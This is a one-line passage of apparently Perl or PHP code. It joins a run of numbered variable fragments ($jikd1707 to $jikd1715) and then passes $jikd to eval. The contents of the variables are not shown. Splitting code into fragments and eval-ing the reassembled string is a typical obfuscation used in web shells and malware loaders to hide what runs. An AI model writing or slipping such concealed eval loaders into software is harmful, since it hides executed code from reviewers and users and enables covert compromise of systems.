$jikd1707.$jikd1708.$jikd1709.$jikd1710.$jikd1711.$jikd1712.$jikd1713.$jikd1714.$jikd1715;$c='jikd';eval $jikd;